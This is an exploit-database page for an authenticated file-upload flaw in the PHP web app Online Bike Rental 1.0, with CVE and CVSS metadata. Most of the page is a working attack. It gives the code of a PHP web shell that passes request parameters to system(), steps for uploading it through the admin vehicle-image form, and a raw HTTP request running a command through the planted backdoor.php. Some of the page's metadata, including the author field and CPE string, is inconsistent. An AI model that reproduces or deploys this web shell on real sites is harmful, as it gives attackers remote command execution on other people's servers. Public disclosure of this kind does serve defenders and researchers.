Advertisement






Online Bike Rental 1.0 Shell Upload

CVE Category Price Severity
CVE-2021-24620 CWE-434 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2020-08-01
CPE
cpe:cpe:none/exploitalert.com/view-details/online-bike-rental-1-0-shell-upload
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020080004

Below is a copy:

Online Bike Rental 1.0 Shell Upload
# Exploit Title: Online Bike Rental v1.0  (Authenticated) Arbitrary File Upload / Remote Code Execution
# Date: July 31, 2020
# Exploit Author: Adeeb Shah (@hyd3sec)
# Vendor Homepage: https:/www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14374/online-bike-rental-phpmysql.html
# Version: 1.0
# Tested on: Windows 10 (x64_86) + XAMPP 7.4.4

Online Bike Rental has an authenticated (admin) arbitrary file upload vulnerability that allows for remote code execution.

1. Create a malicious PHP file with this content:

   <?php 
if(isset($_REQUEST[cmd])){
echo <pre>;
$cmd = ($_REQUEST[cmd]);
system($cmd);
echo </pre>;
die;
}
   ?>


2. Authenticate as admin via admin portal; navigate to manage vehicles and upload malicious php. Navigate to uploaded file path to execute php code.

GET /bikerental%20PHP/bikerental/admin/img/vehicleimages/backdoor.php?cmd=whoami HTTP/1.1

Host: 192.168.222.132

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Cookie: style=purple; PHPSESSID=2lpoqi5jmbeiabqemraesot9nh

Upgrade-Insecure-Requests: 1



Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum